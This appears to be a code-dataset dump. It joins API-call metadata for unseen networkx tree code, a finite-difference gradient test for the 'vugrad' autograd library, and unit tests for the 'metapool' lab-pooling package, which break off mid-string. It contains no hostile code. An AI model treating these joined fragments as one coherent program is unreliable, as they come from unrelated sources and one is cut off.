'itertools.combinations', 'itertools.combinations', (['child', 'k'], {}), '(child, k)\n', (3814, 3824), False, 'import itertools\n'), ((22253, 22281), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree1', 'i'], {}), '(self.__tree1, i)\n', (22264, 22281), True, 'import networkx as nx\n'), ((22306, 22322), 'networkx.compose', 'nx.compose', (['G', 'H'], {}), '(G, H)\n', (22316, 22322), True, 'import networkx as nx\n'), ((20158, 20195), 'itertools.combinations', 'itertools.combinations', (['successor1', 'm'], {}), '(successor1, m)\n', (20180, 20195), False, 'import itertools\n'), ((20766, 20803), 'itertools.combinations', 'itertools.combinations', (['successor2', 'm'], {}), '(successor2, m)\n', (20788, 20803), False, 'import itertools\n'), ((22820, 22871), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree2'], {'source': 'tree_result[1][1]'}), '(self.__tree2, source=tree_result[1][1])\n', (22831, 22871), True, 'import networkx as nx\n'), ((22945, 22996), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree2'], {'source': 'tree_result[2][1]'}), '(self.__tree2, source=tree_result[2][1])\n', (22956, 22996), True, 'import networkx as nx\n'), ((23118, 23134), 'networkx.compose', 'nx.compose', (['G', 'H'], {}), '(G, H)\n', (23128, 23134), True, 'import networkx as nx\n'), ((24242, 24249), 'collections.deque', 'deque', ([], {}), '()\n', (24247, 24249), False, 'from collections import deque\n'), ((23438, 23489), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree1'], {'source': 'tree_result[1][0]'}), '(self.__tree1, source=tree_result[1][0])\n', (23449, 23489), True, 'import networkx as nx\n'), ((23563, 23614), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree1'], {'source': 'tree_result[2][0]'}), '(self.__tree1, source=tree_result[2][0])\n', (23574, 23614), True, 'import networkx as nx\n'), ((23736, 23752), 'networkx.compose', 'nx.compose', (['G', 'H'], {}), '(G, H)\n', (23746, 23752), True, 'import networkx as nx\n'), ((24680, 24719), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree2'], {'source': 'j_tmp'}), '(self.__tree2, source=j_tmp)\n', (24691, 24719), True, 'import networkx as nx\n'), ((24801, 24817), 'networkx.compose', 'nx.compose', (['G', 'H'], {}), '(G, H)\n', (24811, 24817), True, 'import networkx as nx\n'), ((25208, 25247), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree1'], {'source': 'i_tmp'}), '(self.__tree1, source=i_tmp)\n', (25219, 25247), True, 'import networkx as nx\n'), ((25329, 25345), 'networkx.compose', 'nx.compose', (['G', 'H'], {}), '(G, H)\n', (25339, 25345), True, 'import networkx as nx\n'), ((26795, 26844), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree1', 'forest_result[1][1][0]'], {}), '(self.__tree1, forest_result[1][1][0])\n', (26806, 26844), True, 'import networkx as nx\n'), ((26926, 26942), 'networkx.compose', 'nx.compose', (['G', 'H'], {}), '(G, H)\n', (26936, 26942), True, 'import networkx as nx\n'), ((27850, 27899), 'networkx.dfs_tree', 'nx.dfs_tree', (['self.__tree2', 'forest_result[1][1][1]'], {}), '(self.__tree2, forest_result[1][1][1])\n', (27861, 27899), True, 'import networkx as nx\n'), ((27981, 27997), 'networkx.compose', 'nx.compose', (['G', 'H'], {}), '(G, H)\n', (27991, 27997), True, 'import networkx as nx\n')] |
import _context
import unittest
import torch
from torch import nn
import vugrad as vg
import numpy as np
"""
This is mostly a collection of test code at the moment, rather than a proper suite of unit tests.
"""
def fd_mlp():
"""
Test the framework by computing finite differences approximation to the gradient for a random parameter
:return:
"""
IDX = (0, 0)
(xtrain, ytrain), (xval, yval), num_classes = vg.load_synth()
# Slice out a batch and its corresponding target values
batch, targets = xtrain[:100, :], ytrain[:100]
# Wrap the inputs in a Node
batch = vg.TensorNode(value=batch)
num_instances, num_features = xtrain.shape
mlp = vg.MLP(input_size=num_features, output_size=num_classes)
parm = mlp.parameters()[0]
outputs0 = mlp(batch)
loss0 = vg.celoss(outputs0, targets)
loss0.backward()
bp_deriv = parm.grad[IDX]
eps = max(1.5e-8 * parm.value[IDX], 10e-12)
parm.value[IDX] += eps
outputs1 = mlp(batch)
loss1 = vg.celoss(outputs1, targets)
fd_deriv = (loss1.value - loss0.value) / eps
print(f'finite differences: {fd_deriv:.3}')
print(f' backprop: {bp_deriv:.3}')
def finite_differences(function, input='eye'):
"""
Test the framework by computing finite differences approximation to the gradient.
:param function: Some function that takes a matrix and returns a scalar (using Ops).
:return:
"""
N = 5
if type(input) == str:
if input == 'eye':
inp = vg.TensorNode(np.eye(N))
elif input == 'rand':
inp = vg.TensorNode(np.random.randn(N, N))
else:
raise Exception()
else:
inp = vg.TensorNode(input)
N, M = inp.size()
for i in range(N):
for j in range (M):
eps = max(1.5e-8 * inp.value[i, j], 10e-12)
# -- This is supposedly a good epsilon value to use.
loss0 = function(inp)
loss0.backward()
bp_deriv = inp.grad[i, j]
inpe = vg.TensorNode(inp.value.copy())
inpe.value[i, j] += eps
loss1 = function(inpe)
fd_deriv = (loss1.value - loss0.value) / eps
print(i, j)
print(f' finite differences: {fd_deriv:.3}')
print(f' backprop: {bp_deriv:.3}')
loss0.zero_grad()
loss1.zero_grad()
loss0.clear()
loss1.clear()
class TestUtil(unittest.TestCase):
"""
"""
def test_fd0(self):
"""
Test the backprop using finite differences
:return:
"""
finite_differences(lambda x : vg.Sum.do_forward(x))
def test_fd1(self):
"""
Test the backprop using finite differences
:return:
"""
finite_differences(lambda x : vg.Sum.do_forward(vg.Sigmoid.do_forward(x)), input='rand')
def test_fd2(self):
"""
Test the backprop using finite differences
:return:
"""
finite_differences(input='rand', function=lambda x:
vg.Sum.do_forward(
vg.Sigmoid.do_forward(
vg.MatrixMultiply.do_forward(x, x)
)))
def test_fd3(self):
"""
Test the backprop using finite differences
:return:
"""
def fn(x):
x = vg.Exp.do_forward(x)
x = vg.Normalize.do_forward(x)
return vg.Sum.do_forward(x)
finite_differences(
# input=np.asarray([[10.2, 20.4]]),
input=np.asarray([[0.6931471805599453, 0.0]]),
# input=np.random.randn(10, 2),
function=fn)
def test_mlp(self):
fd_mlp() | [
"vugrad.Exp.do_forward",
"vugrad.load_synth",
"numpy.random.randn",
"vugrad.MatrixMultiply.do_forward",
"numpy.asarray",
"vugrad.MLP",
"vugrad.TensorNode",
"vugrad.Sum.do_forward",
"vugrad.Sigmoid.do_forward",
"numpy.eye",
"vugrad.celoss",
"vugrad.Normalize.do_forward"
] | [((436, 451), 'vugrad.load_synth', 'vg.load_synth', ([], {}), '()\n', (449, 451), True, 'import vugrad as vg\n'), ((609, 635), 'vugrad.TensorNode', 'vg.TensorNode', ([], {'value': 'batch'}), '(value=batch)\n', (622, 635), True, 'import vugrad as vg\n'), ((694, 750), 'vugrad.MLP', 'vg.MLP', ([], {'input_size': 'num_features', 'output_size': 'num_classes'}), '(input_size=num_features, output_size=num_classes)\n', (700, 750), True, 'import vugrad as vg\n'), ((822, 850), 'vugrad.celoss', 'vg.celoss', (['outputs0', 'targets'], {}), '(outputs0, targets)\n', (831, 850), True, 'import vugrad as vg\n'), ((1019, 1047), 'vugrad.celoss', 'vg.celoss', (['outputs1', 'targets'], {}), '(outputs1, targets)\n', (1028, 1047), True, 'import vugrad as vg\n'), ((1710, 1730), 'vugrad.TensorNode', 'vg.TensorNode', (['input'], {}), '(input)\n', (1723, 1730), True, 'import vugrad as vg\n'), ((3390, 3410), 'vugrad.Exp.do_forward', 'vg.Exp.do_forward', (['x'], {}), '(x)\n', (3407, 3410), True, 'import vugrad as vg\n'), ((3427, 3453), 'vugrad.Normalize.do_forward', 'vg.Normalize.do_forward', (['x'], {}), '(x)\n', (3450, 3453), True, 'import vugrad as vg\n'), ((3474, 3494), 'vugrad.Sum.do_forward', 'vg.Sum.do_forward', (['x'], {}), '(x)\n', (3491, 3494), True, 'import vugrad as vg\n'), ((1546, 1555), 'numpy.eye', 'np.eye', (['N'], {}), '(N)\n', (1552, 1555), True, 'import numpy as np\n'), ((2676, 2696), 'vugrad.Sum.do_forward', 'vg.Sum.do_forward', (['x'], {}), '(x)\n', (2693, 2696), True, 'import vugrad as vg\n'), ((3590, 3629), 'numpy.asarray', 'np.asarray', (['[[0.6931471805599453, 0.0]]'], {}), '([[0.6931471805599453, 0.0]])\n', (3600, 3629), True, 'import numpy as np\n'), ((1619, 1640), 'numpy.random.randn', 'np.random.randn', (['N', 'N'], {}), '(N, N)\n', (1634, 1640), True, 'import numpy as np\n'), ((2873, 2897), 'vugrad.Sigmoid.do_forward', 'vg.Sigmoid.do_forward', (['x'], {}), '(x)\n', (2894, 2897), True, 'import vugrad as vg\n'), ((3182, 3216), 'vugrad.MatrixMultiply.do_forward', 'vg.MatrixMultiply.do_forward', (['x', 'x'], {}), '(x, x)\n', (3210, 3216), True, 'import vugrad as vg\n')] |
from unittest import TestCase, main
import pandas as pd
import numpy as np
import numpy.testing as npt
import os
from io import StringIO
from metapool.metapool import (read_plate_map_csv, read_pico_csv,
calculate_norm_vol, format_dna_norm_picklist,
format_index_picklist,
compute_qpcr_concentration,
compute_shotgun_pooling_values_eqvol,
compute_shotgun_pooling_values_qpcr,
compute_shotgun_pooling_values_qpcr_minvol,
estimate_pool_conc_vol,
format_pooling_echo_pick_list,
make_2D_array, combine_dfs,
add_dna_conc, compute_pico_concentration,
bcl_scrub_name, rc, sequencer_i5_index,
reformat_interleaved_to_columns)
class Tests(TestCase):
def setUp(self):
self.maxDiff = None
self.cp_vals = np.array([[10.14, 7.89, 7.9, 15.48],
[7.86, 8.07, 8.16, 9.64],
[12.29, 7.64, 7.32, 13.74]])
self.dna_vals = np.array([[10.14, 7.89, 7.9, 15.48],
[7.86, 8.07, 8.16, 9.64],
[12.29, 7.64, 7.32, 13.74]])
self.qpcr_conc = \
np.array([[98.14626462, 487.8121413, 484.3480866, 2.183406934],
[498.3536649, 429.0839787, 402.4270321, 140.1601735],
[21.20533391, 582.9456031, 732.2655041, 7.545145988]])
self.pico_conc = \
np.array([[38.4090909, 29.8863636, 29.9242424, 58.6363636],
[29.7727273, 30.5681818, 30.9090909, 36.5151515],
[46.5530303, 28.9393939, 27.7272727, 52.0454545]])
# def test_compute_shotgun_normalization_values(self):
# input_vol = 3.5
# input_dna = 10
# plate_layout = []
# for i in range(4):
# row = []
# for j in range(4):
# row.append({'dna_concentration': 10,
# 'sample_id': "S%s.%s" % (i, j)})
# plate_layout.append(row)
# obs_sample, obs_water = compute_shotgun_normalization_values(
# plate_layout, input_vol, input_dna)
# exp_sample = np.zeros((4, 4), dtype=np.float)
# exp_water = np.zeros((4, 4), dtype=np.float)
# exp_sample.fill(1000)
# exp_water.fill(2500)
# npt.assert_almost_equal(obs_sample, exp_sample)
# npt.assert_almost_equal(obs_water, exp_water)
# # Make sure that we don't go above the limit
# plate_layout[1][1]['dna_concentration'] = 0.25
# obs_sample, obs_water = compute_shotgun_normalization_values(
# plate_layout, input_vol, input_dna)
# exp_sample[1][1] = 3500
# exp_water[1][1] = 0
# npt.assert_almost_equal(obs_sample, exp_sample)
# npt.assert_almost_equal(obs_water, exp_water)
def test_read_plate_map_csv(self):
plate_map_csv = \
'Sample\tRow\tCol\tBlank\n' + \
'sam1\tA\t1\tFalse\n' + \
'sam2\tA\t2\tFalse\n' + \
'blank1\tB\t1\tTrue\n' + \
'sam3\tB\t2\tFalse\n'
plate_map_f = StringIO(plate_map_csv)
exp_plate_df = pd.DataFrame({'Sample': ['sam1', 'sam2', 'blank1',
'sam3'],
'Row': ['A', 'A', 'B', 'B'],
'Col': [1, 2, 1, 2],
'Well': ['A1', 'A2', 'B1', 'B2'],
'Blank': [False, False, True, False]})
obs_plate_df = read_plate_map_csv(plate_map_f)
pd.testing.assert_frame_equal(
obs_plate_df, exp_plate_df, check_like=True)
def test_read_plate_map_csv_remove_empty_wells(self):
plate_map_csv = (
'Sample\tRow\tCol\tBlank\n'
'sam1\tA\t1\tFalse\n'
'sam2\tA\t2\tFalse\n'
'blank1\tB\t1\tTrue\n'
'\tC\t1\tFalse\n'
'\tD\t1\tFalse\n'
'\tE\t1\tFalse\n'
'sam3\tB\t2\tFalse\n'
'\tD\t2\tFalse\n')
plate_map_f = StringIO(plate_map_csv)
exp = pd.DataFrame({'Sample': ['sam1', 'sam2', 'blank1',
'sam3'],
'Row': ['A', 'A', 'B', 'B'],
'Col': [1, 2, 1, 2],
'Well': ['A1', 'A2', 'B1', 'B2'],
'Blank': [False, False, True, False]})
with self.assertWarnsRegex(UserWarning,
'This plate map contains 4 empty wells, '
'these will be ignored'):
obs_plate_df = read_plate_map_csv(plate_map_f)
pd.testing.assert_frame_equal(
obs_plate_df, exp, check_like=True)
def test_read_plate_map_csv_error_repeated_sample_names(self):
plate_map_csv = \
'Sample\tRow\tCol\tBlank\n' + \
'sam1\tA\t1\tFalse\n' + \
'sam2\tA\t2\tFalse\n' + \
'blank1\tB\t1\tTrue\n' + \
'blank1\tB\t4\tTrue\n'
plate_map_f = StringIO(plate_map_csv)
with self.assertRaises(Exception):
read_plate_map_csv(plate_map_f)
def test_read_pico_csv(self):
# Test a normal sheet
pico_csv = '''Results
Well ID\tWell\t[Blanked-RFU]\t[Concentration]
SPL1\tA1\t5243.000\t3.432
SPL2\tA2\t4949.000\t3.239
SPL3\tB1\t15302.000\t10.016
SPL4\tB2\t4039.000\t2.644
Curve2 Fitting Results
Curve Name\tCurve Formula\tA\tB\tR2\tFit F Prob
Curve2\tY=A*X+B\t1.53E+003\t0\t0.995\t?????
'''
exp_pico_df = pd.DataFrame({'Well': ['A1', 'A2', 'B1', 'B2'],
'Sample DNA Concentration':
[3.432, 3.239, 10.016, 2.644]})
pico_csv_f = StringIO(pico_csv)
obs_pico_df = read_pico_csv(pico_csv_f)
pd.testing.assert_frame_equal(
obs_pico_df, exp_pico_df, check_like=True)
# Test a sheet that has some ???? zero values
pico_csv = '''Results
Well ID\tWell\t[Blanked-RFU]\t[Concentration]
SPL1\tA1\t5243.000\t3.432
SPL2\tA2\t4949.000\t3.239
SPL3\tB1\t15302.000\t10.016
SPL4\tB2\t\t?????
Curve2 Fitting Results
Curve Name\tCurve Formula\tA\tB\tR2\tFit F Prob
Curve2\tY=A*X+B\t1.53E+003\t0\t0.995\t?????
'''
exp_pico_df = pd.DataFrame({'Well': ['A1', 'A2', 'B1', 'B2'],
'Sample DNA Concentration':
[3.432, 3.239, 10.016, np.nan]})
pico_csv_f = StringIO(pico_csv)
obs_pico_df = read_pico_csv(pico_csv_f)
pd.testing.assert_frame_equal(
obs_pico_df, exp_pico_df, check_like=True)
def test_read_pico_csv_spectramax(self):
# Test a normal sheet
fp_spectramax = os.path.join(os.path.dirname(__file__), 'data',
'pico_spectramax.txt')
obs_pico_df = read_pico_csv(fp_spectramax,
plate_reader='SpectraMax_i3x')
self.assertEqual(obs_pico_df.shape[0], 384)
self.assertEqual(list(obs_pico_df.columns),
['Well', 'Sample DNA Concentration'])
# Test Invalid plate_reader error
with self.assertRaises(ValueError):
read_pico_csv(fp_spectramax, plate_reader='foo')
def test_calculate_norm_vol(self):
dna_concs = np.array([[2, 7.89],
[np.nan, .0]])
exp_vols = np.array([[2500., 632.5],
[3500., 3500.]])
obs_vols = calculate_norm_vol(dna_concs)
np.testing.assert_allclose(exp_vols, obs_vols)
def test_format_dna_norm_picklist(self):
exp_picklist = (
'Sample\tSource Plate Name\tSource Plate Type\tSource Well\t'
'Concentration\tTransfer Volume\tDestination Plate Name\t'
'Destination Well\n'
'sam1\tWater\t384PP_AQ_BP2_HT\tA1\t2.0\t1000.0\tNormalizedDNA\t'
'A1\n'
'sam2\tWater\t384PP_AQ_BP2_HT\tA2\t7.89\t2867.5\tNormalizedDNA\t'
'A2\n'
'blank1\tWater\t384PP_AQ_BP2_HT\tB1\tnan\t0.0\tNormalizedDNA\t'
'B1\n'
'sam3\tWater\t384PP_AQ_BP2_HT\tB2\t0.0\t0.0\tNormalizedDNA\t'
'B2\n'
'sam1\tSample\t384PP_AQ_BP2_HT\tA1\t2.0\t2500.0\tNormalizedDNA\t'
'A1\n'
'sam2\tSample\t384PP_AQ_BP2_HT\tA2\t7.89\t632.5\tNormalizedDNA\t'
'A2\n'
'blank1\tSample\t384PP_AQ_BP2_HT\tB1\tnan\t3500.0\t'
'NormalizedDNA\tB1\n'
'sam3\tSample\t384PP_AQ_BP2_HT\tB2\t0.0\t3500.0\tNormalizedDNA\t'
'B2')
dna_vols = np.array([[2500., 632.5],
[3500., 3500.]])
water_vols = 3500 - dna_vols
wells = np.array([['A1', 'A2'],
['B1', 'B2']])
sample_names = np.array([['sam1', 'sam2'],
['blank1', 'sam3']])
dna_concs = np.array([[2, 7.89],
[np.nan, .0]])
obs_picklist = format_dna_norm_picklist(dna_vols, water_vols, wells,
sample_names=sample_names,
dna_concs=dna_concs)
self.assertEqual(exp_picklist, obs_picklist)
# test if switching dest wells
exp_picklist = (
'Sample\tSource Plate Name\tSource Plate Type\tSource Well\t'
'Concentration\tTransfer Volume\tDestination Plate Name\t'
'Destination Well\n'
'sam1\tWater\t384PP_AQ_BP2_HT\tA1\t2.0\t1000.0\tNormalizedDNA\t'
'D1\n'
'sam2\tWater\t384PP_AQ_BP2_HT\tA2\t7.89\t2867.5\tNormalizedDNA\t'
'D2\n'
'blank1\tWater\t384PP_AQ_BP2_HT\tB1\tnan\t0.0\tNormalizedDNA\t'
'E1\n'
'sam3\tWater\t384PP_AQ_BP2_HT\tB2\t0.0\t0.0\tNormalizedDNA\t'
'E2\n'
'sam1\tSample\t384PP_AQ_BP2_HT\tA1\t2.0\t2500.0\tNormalizedDNA\t'
'D1\n'
'sam2\tSample\t384PP_AQ_BP2_HT\tA2\t7.89\t632.5\tNormalizedDNA\t'
'D2\n'
'blank1\tSample\t384PP_AQ_BP2_HT\tB1\tnan\t3500.0\tNormalizedDNA\t'
'E1\n'
'sam3\tSample\t384PP_AQ_BP2_HT\tB2\t0.0\t3500.0\tNormalizedDNA\t'
'E2')
dna_vols = np.array([[2500., 632.5],
[3500., 3500.]])
water_vols = 3500 - dna_vols
wells = np.array([['A1', 'A2'],
['B1', 'B2']])
dest_wells = np.array([['D1', 'D2'],
['E1', 'E2']])
sample_names = np.array([['sam1', 'sam2'],
['blank1', 'sam3']])
dna_concs = np.array([[2, 7.89],
[np.nan, .0]])
obs_picklist = format_dna_norm_picklist(dna_vols, water_vols, wells,
dest_wells=dest_wells,
sample_names=sample_names,
dna_concs=dna_concs)
self.assertEqual(exp_picklist, obs_picklist)
# test if switching source plates
exp_picklist = (
'Sample\tSource Plate Name\tSource Plate Type\tSource Well\t'
'Concentration\tTransfer Volume\tDestination Plate Name\t'
'Destination Well\n'
'sam1\tWater\t384PP_AQ_BP2_HT\tA1\t2.0\t1000.0\tNormalizedDNA\t'
'A1\n'
'sam2\tWater\t384PP_AQ_BP2_HT\tA2\t7.89\t2867.5\tNormalizedDNA\t'
'A2\n'
'blank1\tWater\t384PP_AQ_BP2_HT\tB1\tnan\t0.0\tNormalizedDNA\t'
'B1\n'
'sam3\tWater\t384PP_AQ_BP2_HT\tB2\t0.0\t0.0\tNormalizedDNA\t'
'B2\n'
'sam1\tSample_Plate1\t384PP_AQ_BP2_HT\tA1\t2.0\t2500.0\t'
'NormalizedDNA\tA1\n'
'sam2\tSample_Plate1\t384PP_AQ_BP2_HT\tA2\t7.89\t632.5\t'
'NormalizedDNA\tA2\n'
'blank1\tSample_Plate2\t384PP_AQ_BP2_HT\tB1\tnan\t3500.0\t'
'NormalizedDNA\tB1\n'
'sam3\tSample_Plate2\t384PP_AQ_BP2_HT\tB2\t0.0\t3500.0\t'
'NormalizedDNA\tB2')
dna_vols = np.array([[2500., 632.5],
[3500., 3500.]])
water_vols = 3500 - dna_vols
wells = np.array([['A1', 'A2'],
['B1', 'B2']])
sample_names = np.array([['sam1', 'sam2'],
['blank1', 'sam3']])
sample_plates = np.array([['Sample_Plate1', 'Sample_Plate1'],
['Sample_Plate2', 'Sample_Plate2']])
dna_concs = np.array([[2, 7.89],
[np.nan, .0]])
obs_picklist = format_dna_norm_picklist(dna_vols, water_vols, wells,
sample_names=sample_names,
sample_plates=sample_plates,
dna_concs=dna_concs)
self.assertEqual(exp_picklist, obs_picklist)
def test_format_index_picklist(self):
exp_picklist = (
'Sample\tSource Plate Name\tSource Plate Type\tSource Well\t'
'Transfer Volume\tIndex Name\t'
'Index Sequence\tIndex Combo\tDestination Plate Name\t'
'Destination Well\n'
'sam1\tiTru5_plate\t384LDV_AQ_B2_HT\tA1\t250\tiTru5_01_A\t'
'ACCGACAA\t0\tIndexPCRPlate\tA1\n'
'sam2\tiTru5_plate\t384LDV_AQ_B2_HT\tB1\t250\tiTru5_01_B\t'
'AGTGGCAA\t1\tIndexPCRPlate\tA2\n'
'blank1\tiTru5_plate\t384LDV_AQ_B2_HT\tC1\t250\tiTru5_01_C\t'
'CACAGACT\t2\tIndexPCRPlate\tB1\n'
'sam3\tiTru5_plate\t384LDV_AQ_B2_HT\tD1\t250\tiTru5_01_D\t'
'CGACACTT\t3\tIndexPCRPlate\tB2\n'
'sam1\tiTru7_plate\t384LDV_AQ_B2_HT\tA1\t250\tiTru7_101_01\t'
'ACGTTACC\t0\tIndexPCRPlate\tA1\n'
'sam2\tiTru7_plate\t384LDV_AQ_B2_HT\tA2\t250\tiTru7_101_02\t'
'CTGTGTTG\t1\tIndexPCRPlate\tA2\n'
'blank1\tiTru7_plate\t384LDV_AQ_B2_HT\tA3\t250\tiTru7_101_03\t'
'TGAGGTGT\t2\tIndexPCRPlate\tB1\n'
'sam3\tiTru7_plate\t384LDV_AQ_B2_HT\tA4\t250\tiTru7_101_04\t'
'GATCCATG\t3\tIndexPCRPlate\tB2')
sample_wells = np.array(['A1', 'A2', 'B1', 'B2'])
sample_names = np.array(['sam1', 'sam2', 'blank1', 'sam3'])
indices = pd.DataFrame({'i5 name': {0: 'iTru5_01_A',
1: 'iTru5_01_B',
2: 'iTru5_01_C',
3: 'iTru5_01_D'},
'i5 plate': {0: 'iTru5_plate',
1: 'iTru5_plate',
2: 'iTru5_plate',
3: 'iTru5_plate'},
'i5 sequence': {0: 'ACCGACAA', 1: 'AGTGGCAA',
2: 'CACAGACT', 3: 'CGACACTT'},
'i5 well': {0: 'A1', 1: 'B1', 2: 'C1',
3: 'D1'},
'i7 name': {0: 'iTru7_101_01',
1: 'iTru7_101_02',
2: 'iTru7_101_03',
3: 'iTru7_101_04'},
'i7 plate': {0: 'iTru7_plate',
1: 'iTru7_plate',
2: 'iTru7_plate',
3: 'iTru7_plate'},
'i7 sequence': {0: 'ACGTTACC', 1: 'CTGTGTTG',
2: 'TGAGGTGT', 3: 'GATCCATG'},
'i7 well': {0: 'A1', 1: 'A2', 2: 'A3',
3: 'A4'},
'index combo': {0: 0, 1: 1, 2: 2, 3: 3},
'index combo seq': {0: 'ACCGACAAACGTTACC',
1: 'AGTGGCAACTGTGTTG',
2: 'CACAGACTTGAGGTGT',
3: 'CGACACTTGATCCATG'}})
obs_picklist = format_index_picklist(
sample_names, sample_wells, indices)
self.assertEqual(exp_picklist, obs_picklist)
def test_compute_qpcr_concentration(self):
obs = compute_qpcr_concentration(self.cp_vals)
exp = self.qpcr_conc
npt.assert_allclose(obs, exp)
def test_compute_shotgun_pooling_values_eqvol(self):
obs_sample_vols = \
compute_shotgun_pooling_values_eqvol(self.qpcr_conc,
total_vol=60.0)
exp_sample_vols = np.zeros([3, 4]) + 60.0/12*1000
npt.assert_allclose(obs_sample_vols, exp_sample_vols)
def test_compute_shotgun_pooling_values_eqvol_intvol(self):
obs_sample_vols = \
compute_shotgun_pooling_values_eqvol(self.qpcr_conc,
total_vol=60)
exp_sample_vols = np.zeros([3, 4]) + 60.0/12*1000
npt.assert_allclose(obs_sample_vols, exp_sample_vols)
def test_compute_shotgun_pooling_values_qpcr(self):
sample_concs = np.array([[1, 12, 400],
[200, 40, 1]])
exp_vols = np.array([[0, 50000, 6250],
[12500, 50000, 0]])
obs_vols = compute_shotgun_pooling_values_qpcr(sample_concs)
npt.assert_allclose(exp_vols, obs_vols)
def test_compute_shotgun_pooling_values_qpcr_minvol(self):
sample_concs = np.array([[1, 12, 400],
[200, 40, 1]])
exp_vols = np.array([[100, 100, 4166.6666666666],
[8333.33333333333, 41666.666666666, 100]])
obs_vols = compute_shotgun_pooling_values_qpcr_minvol(sample_concs)
npt.assert_allclose(exp_vols, obs_vols)
def test_estimate_pool_conc_vol(self):
obs_sample_vols = compute_shotgun_pooling_values_eqvol(
self.qpcr_conc, total_vol=60.0)
obs_pool_conc, obs_pool_vol = estimate_pool_conc_vol(
obs_sample_vols, self.qpcr_conc)
exp_pool_conc = 323.873027979
exp_pool_vol = 60000.0
npt.assert_almost_equal(obs_pool_conc, exp_pool_conc)
npt.assert_almost_equal(obs_pool_vol, exp_pool_vol)
def test_format_pooling_echo_pick_list(self):
vol_sample = np.array([[10.00, 10.00, 5.00, 5.00, 10.00, 10.00]])
header = ['Source Plate Name,Source Plate Type,Source Well,'
'Concentration,Transfer Volume,Destination Plate Name,'
'Destination Well']
exp_values = ['1,384LDV_AQ_B2_HT,A1,,10.00,NormalizedDNA,A1',
'1,384LDV_AQ_B2_HT,A2,,10.00,NormalizedDNA,A1',
'1,384LDV_AQ_B2_HT,A3,,5.00,NormalizedDNA,A1',
'1,384LDV_AQ_B2_HT,A4,,5.00,NormalizedDNA,A2',
'1,384LDV_AQ_B2_HT,A5,,10.00,NormalizedDNA,A2',
'1,384LDV_AQ_B2_HT,A6,,10.00,NormalizedDNA,A2']
exp_str = '\n'.join(header + exp_values)
obs_str = format_pooling_echo_pick_list(vol_sample,
max_vol_per_well=26,
dest_plate_shape=[16, 24])
self.maxDiff = None
self.assertEqual(exp_str, obs_str)
def test_format_pooling_echo_pick_list_nan(self):
vol_sample = np.array([[10.00, 10.00, np.nan, 5.00, 10.00, 10.00]])
header = ['Source Plate Name,Source Plate Type,Source Well,'
'Concentration,Transfer Volume,Destination Plate Name,'
'Destination Well']
exp_values = ['1,384LDV_AQ_B2_HT,A1,,10.00,NormalizedDNA,A1',
'1,384LDV_AQ_B2_HT,A2,,10.00,NormalizedDNA,A1',
'1,384LDV_AQ_B2_HT,A3,,0.00,NormalizedDNA,A1',
'1,384LDV_AQ_B2_HT,A4,,5.00,NormalizedDNA,A1',
'1,384LDV_AQ_B2_HT,A5,,10.00,NormalizedDNA,A2',
'1,384LDV_AQ_B2_HT,A6,,10.00,NormalizedDNA,A2']
exp_str = '\n'.join(header + exp_values)
obs_str = format_pooling_echo_pick_list(vol_sample,
max_vol_per_well=26,
dest_plate_shape=[16, 24])
self.maxDiff = None
self.assertEqual(exp_str, obs_str)
def test_make_2D_array(self):
example_qpcr_df = pd.DataFrame({'Cp': [12, 0, 5, np.nan],
'Pos': ['A1', 'A2', 'A3', 'A4']})
exp_cp_array = np.array([[12.0, 0.0, 5.0, np.nan]])
np.testing.assert_allclose(make_2D_array(
example_qpcr_df, rows=1, cols=4).astype(float), exp_cp_array)
example2_qpcr_df = pd.DataFrame({'Cp': [12, 0, 1, np.nan,
12, 0, 5, np.nan],
'Pos': ['A1', 'A2', 'A3', 'A4',
'B1', 'B2', 'B3', 'B4']})
exp2_cp_array = np.array([[12.0, 0.0, 1.0, np.nan],
[12.0, 0.0, 5.0, np.nan]])
np.testing.assert_allclose(make_2D_array(
example2_qpcr_df, rows=2, cols=4).astype(float), exp2_cp_array)
def combine_dfs(self):
test_index_picklist_f = (
'\tWell Number\tPlate\tSample Name\tSource Plate Name\t'
'Source Plate Type\tCounter\tPrimer\tSource Well\tIndex\t'
'Unnamed: 9\tUnnamed: 10\tUnnamed: 11\tTransfer volume\t'
'Destination Well\tUnnamed: 14\n'
'0\t1\tABTX_35\t8_29_13_rk_rh\ti5 Source Plate\t384LDV_AQ_B2_HT\t'
'1841.0\tiTru5_01_G\tG1\tGTTCCATG\tiTru7_110_05\tA23\tCGCTTAAC\t'
'250\tA1\tNaN\n'
'1\t2\tABTX_35\t8_29_13_rk_lh\ti5 Source Plate\t384LDV_AQ_B2_HT\t'
'1842.0\tiTru5_01_H\tH1\tTAGCTGAG\tiTru7_110_06\tB23\tCACCACTA\t'
'250\tC1\tNaN\n'
'2\t1\tABTX_35\t8_29_13_rk_rh\ti7 Source Plate\t384LDV_AQ_B2_HT\t'
'1841.0\tiTru7_110_05\tA23\tCGCTTAAC\t\t\t\t250\tA1\tNaN\n'
'3\t2\tABTX_35\t8_29_13_rk_lh\ti7 Source Plate\t384LDV_AQ_B2_HT\t'
'1842.0\tiTru7_110_06\tB23\tCACCACTA\t\t\t\t250\tC1\tNaN')
test_dna_picklist_f = (
'\tSource Plate Name\tSource Plate Type\tSource Well\t'
'Concentration\tTransfer Volume\tDestination Plate Name\t'
'Destination Well\n'
'0\twater\t384LDV_AQ_B2_HT\tA1\tNaN\t3420.0\tNormalizedDNA\tA1\n'
'1\twater\t384LDV_AQ_B2_HT\tC1\tNaN\t3442.5\tNormalizedDNA\tC1\n'
'5\t1\t384LDV_AQ_B2_HT\tA1\t12.751753\t80.0\tNormalizedDNA\tA1\n'
'6\t1\t384LDV_AQ_B2_HT\tC1\t17.582063\t57.5\tNormalizedDNA\tC1')
test_qpcr_f = (
'\tInclude\tColor\tPos\tName\tCp\tConcentration\tStandard\tStatus'
'0\tTRUE\t255\tA1\tSample 1\t20.55\tNaN\t0\tNaN'
'1\tTRUE\t255\tC1\tSample 2\t9.15\tNaN\t0\tNaN')
exp_out_f = (
'Well\tCp\tDNA Concentration\tDNA Transfer Volume\tSample Name\t'
'Plate\tCounter\tPrimer i7\tSource Well i7\tIndex i7\tPrimer i5\t'
'Source Well i5\tIndex i5'
